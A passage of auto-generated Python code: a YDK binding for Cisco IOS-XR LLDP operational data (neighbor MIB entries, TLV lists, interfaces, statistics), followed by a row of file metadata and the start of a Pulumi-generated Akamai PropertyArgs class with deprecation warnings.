**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined capabilities
**type**\: int
**range:** 0..4294967295
"""
# Auto-generated YDK binding: LLDP-MIB style view of the neighbor entry
# under the summary table (mirrors Details.Detail.LldpNeighbor.Mib).
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Statement order matters: the overridden __setattr__ validates writes
# once _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib, self).__init__()
self.yang_name = "mib"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList))])
self._leafs = OrderedDict([
('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
])
self.rem_time_mark = None
self.rem_local_port_num = None
self.rem_index = None
self.chassis_id_sub_type = None
self.chassis_id_len = None
self.port_id_sub_type = None
self.port_id_len = None
self.combined_capabilities = None
# Wire up the two singleton child containers.
self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList()
self.unknown_tlv_list.parent = self
self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList()
self.org_def_tlv_list.parent = self
self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
self._segment_path = lambda: "mib"
# Freeze last: from here on only declared leaf names can be assigned.
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib, ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities'], name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Assignment order matters: __setattr__ validates writes once
# _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
self.yang_name = "unknown-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
self._leafs = OrderedDict()
# Keyless YANG list of TLVs the device did not recognize.
self.lldp_unknown_tlv_entry = YList(self)
self._segment_path = lambda: "unknown-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
# No writable leaves on this container (empty leaf-name list).
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList, [], name, value)
class LldpUnknownTlvEntry(Entity):
"""
lldp unknown tlv entry
.. attribute:: tlv_type
Unknown TLV type
**type**\: int
**range:** 0..255
.. attribute:: tlv_value
Unknown TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
self.yang_name = "lldp-unknown-tlv-entry"
self.yang_parent_name = "unknown-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.tlv_type = None
self.tlv_value = None
self._segment_path = lambda: "lldp-unknown-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
self.yang_name = "org-def-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
self._leafs = OrderedDict()
self.lldp_org_def_tlv_entry = YList(self)
self._segment_path = lambda: "org-def-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList, [], name, value)
class LldpOrgDefTlvEntry(Entity):
"""
lldp org def tlv entry
.. attribute:: oui
Organizationally Unique Identifier
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_subtype
Org Def TLV subtype
**type**\: int
**range:** 0..255
.. attribute:: tlv_info_indes
lldpRemOrgDefInfoIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_value
Org Def TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
self.yang_name = "lldp-org-def-tlv-entry"
self.yang_parent_name = "org-def-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.oui = None
self.tlv_subtype = None
self.tlv_info_indes = None
self.tlv_value = None
self._segment_path = lambda: "lldp-org-def-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Interfaces(Entity):
"""
The table of interfaces on which LLDP is
running on this node
.. attribute:: interface
Operational data for an interface on which LLDP is running
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Lldp.Nodes.Node.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces, [], name, value)
class Interface(Entity):
"""
Operational data for an interface on which
LLDP is running
.. attribute:: interface_name (key)
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: local_network_addresses
Local Management Addresses
**type**\: :py:class:`LocalNetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses>`
.. attribute:: interface_name_xr
Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: tx_enabled
TX Enabled
**type**\: int
**range:** 0..255
.. attribute:: rx_enabled
RX Enabled
**type**\: int
**range:** 0..255
.. attribute:: tx_state
TX State
**type**\: str
.. attribute:: rx_state
RX State
**type**\: str
.. attribute:: if_index
ifIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: port_id
Outgoing port identifier
**type**\: str
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_description
Port Description
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([("local-network-addresses", ("local_network_addresses", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('tx_enabled', (YLeaf(YType.uint8, 'tx-enabled'), ['int'])),
('rx_enabled', (YLeaf(YType.uint8, 'rx-enabled'), ['int'])),
('tx_state', (YLeaf(YType.str, 'tx-state'), ['str'])),
('rx_state', (YLeaf(YType.str, 'rx-state'), ['str'])),
('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
('port_id', (YLeaf(YType.str, 'port-id'), ['str'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
])
self.interface_name = None
self.interface_name_xr = None
self.tx_enabled = None
self.rx_enabled = None
self.tx_state = None
self.rx_state = None
self.if_index = None
self.port_id = None
self.port_id_sub_type = None
self.port_description = None
self.local_network_addresses = Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses()
self.local_network_addresses.parent = self
self._children_name_map["local_network_addresses"] = "local-network-addresses"
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface, ['interface_name', 'interface_name_xr', 'tx_enabled', 'rx_enabled', 'tx_state', 'rx_state', 'if_index', 'port_id', 'port_id_sub_type', 'port_description'], name, value)
class LocalNetworkAddresses(Entity):
"""
Local Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses, self).__init__()
self.yang_name = "local-network-addresses"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "local-network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "local-network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Statistics(Entity):
"""
The LLDP traffic statistics for this node
.. attribute:: transmitted_packets
Transmitted packets
**type**\: int
**range:** 0..4294967295
.. attribute:: aged_out_entries
Aged out entries
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_packets
Discarded packets
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_packets
Bad packet received and dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: received_packets
Received packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_tl_vs
Discarded TLVs
**type**\: int
**range:** 0..4294967295
.. attribute:: unrecognized_tl_vs
Unrecognized TLVs
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_memory_errors
Out\-of\-memory conditions
**type**\: int
**range:** 0..4294967295
.. attribute:: encapsulation_errors
Transmission errors
**type**\: int
**range:** 0..4294967295
.. attribute:: queue_overflow_errors
Queue overflows
**type**\: int
**range:** 0..4294967295
.. attribute:: table_overflow_errors
Table overflows
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('transmitted_packets', (YLeaf(YType.uint32, 'transmitted-packets'), ['int'])),
('aged_out_entries', (YLeaf(YType.uint32, 'aged-out-entries'), ['int'])),
('discarded_packets', (YLeaf(YType.uint32, 'discarded-packets'), ['int'])),
('bad_packets', (YLeaf(YType.uint32, 'bad-packets'), ['int'])),
('received_packets', (YLeaf(YType.uint32, 'received-packets'), ['int'])),
('discarded_tl_vs', (YLeaf(YType.uint32, 'discarded-tl-vs'), ['int'])),
('unrecognized_tl_vs', (YLeaf(YType.uint32, 'unrecognized-tl-vs'), ['int'])),
('out_of_memory_errors', (YLeaf(YType.uint32, 'out-of-memory-errors'), ['int'])),
('encapsulation_errors', (YLeaf(YType.uint32, 'encapsulation-errors'), ['int'])),
('queue_overflow_errors', (YLeaf(YType.uint32, 'queue-overflow-errors'), ['int'])),
('table_overflow_errors', (YLeaf(YType.uint32, 'table-overflow-errors'), ['int'])),
])
self.transmitted_packets = None
self.aged_out_entries = None
self.discarded_packets = None
self.bad_packets = None
self.received_packets = None
self.discarded_tl_vs = None
self.unrecognized_tl_vs = None
self.out_of_memory_errors = None
self.encapsulation_errors = None
self.queue_overflow_errors = None
self.table_overflow_errors = None
self._segment_path = lambda: "statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Statistics, ['transmitted_packets', 'aged_out_entries', 'discarded_packets', 'bad_packets', 'received_packets', 'discarded_tl_vs', 'unrecognized_tl_vs', 'out_of_memory_errors', 'encapsulation_errors', 'queue_overflow_errors', 'table_overflow_errors'], name, value)
def clone_ptr(self):
self._top_entity = Lldp()
return self._top_entity
| 54.714012 | 376 | 0.37557 | 11,890 | 171,036 | 5.132885 | 0.023802 | 0.030673 | 0.043028 | 0.061281 | 0.920334 | 0.903703 | 0.878601 | 0.865853 | 0.856022 | 0.851696 | 0 | 0.021384 | 0.535466 | 171,036 | 3,125 | 377 | 54.73152 | 0.746753 | 0.180143 | 0 | 0.753859 | 0 | 0 | 0.121866 | 0.024187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078798 | false | 0 | 0.004062 | 0 | 0.126726 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c1d45b6715982b34a08cb5a4d252b6b356100d3 | 42,305 | py | Python | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2021-01-21T15:22:12.000Z | 2021-08-25T14:15:29.000Z | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | 59 | 2020-08-13T14:39:36.000Z | 2022-03-31T15:19:48.000Z | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
# Public API of this module for `import *`; `Property` is presumably defined
# later in the file (outside this view) — TODO confirm.
__all__ = ['PropertyArgs', 'Property']
# Typed argument bag for constructing a `Property` resource.  The
# `@pulumi.input_type` decorator wires the class into the Pulumi SDK: values
# are stored/read through `pulumi.set`/`pulumi.get` rather than plain
# attributes, and the `@pulumi.getter(name=...)` overrides map snake_case
# Python attributes to their camelCase wire names.
# NOTE: generated code — do not hand-edit logic; regenerate via tfgen instead.
@pulumi.input_type
class PropertyArgs:
    def __init__(__self__, *,
                 contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 contract: Optional[pulumi.Input[str]] = None,
                 contract_id: Optional[pulumi.Input[str]] = None,
                 cp_code: Optional[pulumi.Input[str]] = None,
                 group: Optional[pulumi.Input[str]] = None,
                 group_id: Optional[pulumi.Input[str]] = None,
                 hostnames: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]] = None,
                 is_secure: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 origins: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]] = None,
                 product: Optional[pulumi.Input[str]] = None,
                 product_id: Optional[pulumi.Input[str]] = None,
                 rule_format: Optional[pulumi.Input[str]] = None,
                 rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]] = None,
                 rules: Optional[pulumi.Input[str]] = None,
                 variables: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Property resource.

        Deprecated arguments (``contacts``, ``contract``, ``cp_code``,
        ``group``, ``is_secure``, ``origins``, ``product``, ``rule_warnings``,
        ``variables``) emit a deprecation warning when supplied but are still
        stored, so existing programs keep working.

        :param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
        :param pulumi.Input[str] group_id: Group ID to be assigned to the Property
        :param pulumi.Input[str] name: Name to give to the Property (must be unique)
        :param pulumi.Input[str] product_id: Product ID to be assigned to the Property
        :param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
        :param pulumi.Input[str] rules: Property Rules as JSON
        """
        # Generated pattern: for every deprecated setting, warn via both the
        # stdlib `warnings` module and the Pulumi engine log, then store the
        # value anyway.  Arguments left as None are never stored at all.
        if contacts is not None:
            warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
        if contacts is not None:
            pulumi.set(__self__, "contacts", contacts)
        if contract is not None:
            warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
        if contract is not None:
            pulumi.set(__self__, "contract", contract)
        if contract_id is not None:
            pulumi.set(__self__, "contract_id", contract_id)
        if cp_code is not None:
            warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
        if cp_code is not None:
            pulumi.set(__self__, "cp_code", cp_code)
        if group is not None:
            warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
        if group is not None:
            pulumi.set(__self__, "group", group)
        if group_id is not None:
            pulumi.set(__self__, "group_id", group_id)
        if hostnames is not None:
            pulumi.set(__self__, "hostnames", hostnames)
        if is_secure is not None:
            warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
        if is_secure is not None:
            pulumi.set(__self__, "is_secure", is_secure)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if origins is not None:
            warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
        if origins is not None:
            pulumi.set(__self__, "origins", origins)
        if product is not None:
            warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
        if product is not None:
            pulumi.set(__self__, "product", product)
        if product_id is not None:
            pulumi.set(__self__, "product_id", product_id)
        if rule_format is not None:
            pulumi.set(__self__, "rule_format", rule_format)
        if rule_warnings is not None:
            warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
            pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
        if rule_warnings is not None:
            pulumi.set(__self__, "rule_warnings", rule_warnings)
        if rules is not None:
            pulumi.set(__self__, "rules", rules)
        if variables is not None:
            warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
            pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
        if variables is not None:
            pulumi.set(__self__, "variables", variables)

    # --- Accessors ------------------------------------------------------
    # Each property below simply proxies `pulumi.get`/`pulumi.set` on the
    # input bag; getters with `name="..."` declare the camelCase wire name.

    @property
    @pulumi.getter
    def contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "contacts")

    @contacts.setter
    def contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "contacts", value)

    @property
    @pulumi.getter
    def contract(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "contract")

    @contract.setter
    def contract(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "contract", value)

    @property
    @pulumi.getter(name="contractId")
    def contract_id(self) -> Optional[pulumi.Input[str]]:
        """
        Contract ID to be assigned to the Property
        """
        return pulumi.get(self, "contract_id")

    @contract_id.setter
    def contract_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "contract_id", value)

    @property
    @pulumi.getter(name="cpCode")
    def cp_code(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "cp_code")

    @cp_code.setter
    def cp_code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cp_code", value)

    @property
    @pulumi.getter
    def group(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "group")

    @group.setter
    def group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group", value)

    @property
    @pulumi.getter(name="groupId")
    def group_id(self) -> Optional[pulumi.Input[str]]:
        """
        Group ID to be assigned to the Property
        """
        return pulumi.get(self, "group_id")

    @group_id.setter
    def group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_id", value)

    @property
    @pulumi.getter
    def hostnames(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]:
        return pulumi.get(self, "hostnames")

    @hostnames.setter
    def hostnames(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]):
        pulumi.set(self, "hostnames", value)

    @property
    @pulumi.getter(name="isSecure")
    def is_secure(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "is_secure")

    @is_secure.setter
    def is_secure(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_secure", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name to give to the Property (must be unique)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def origins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]:
        return pulumi.get(self, "origins")

    @origins.setter
    def origins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]):
        pulumi.set(self, "origins", value)

    @property
    @pulumi.getter
    def product(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "product")

    @product.setter
    def product(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "product", value)

    @property
    @pulumi.getter(name="productId")
    def product_id(self) -> Optional[pulumi.Input[str]]:
        """
        Product ID to be assigned to the Property
        """
        return pulumi.get(self, "product_id")

